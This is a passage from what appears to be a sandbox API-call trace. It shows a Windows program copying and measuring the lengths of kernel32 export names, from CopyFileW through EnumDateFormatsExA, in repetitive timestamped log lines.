lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.324] lstrlenA (lpString="COPYFILEW") returned 9 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.324] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.325] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.325] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.325] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.325] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.325] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.325] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.325] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.325] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.325] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.325] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.325] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.325] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.325] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.325] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.325] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.325] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.325] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.325] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.325] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.326] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.326] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.326] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.326] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.326] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.326] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.326] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.326] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.326] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.326] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.326] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.326] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.326] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.326] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.326] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.326] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.326] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.326] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.326] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.326] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.327] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.327] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.327] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.327] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.327] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.327] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.327] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.327] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.327] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.327] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.327] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.328] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.328] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.328] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.328] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.328] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.328] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.328] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.328] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.328] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.328] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.328] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.328] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.328] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.328] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.328] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.328] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.328] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.328] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.328] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.329] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.329] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.329] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.329] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.329] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.329] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.329] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.329] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.329] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.329] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.329] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.329] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.329] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.329] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.329] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.329] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.329] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.329] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.329] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.330] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.330] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.330] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.330] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.330] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.330] lstrlenA (lpString="DELETEATOM") returned 10 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.330] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.330] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.330] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.330] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.330] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.330] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.330] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.330] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.330] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.330] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.330] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.330] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.330] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.331] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.331] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.331] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.331] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.331] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.331] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.331] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.331] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.331] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.331] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.331] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.331] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.331] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.331] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.331] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.331] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.331] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.331] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.331] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.332] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.332] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.332] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.332] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.332] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.332] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.332] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.332] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.332] lstrlenA 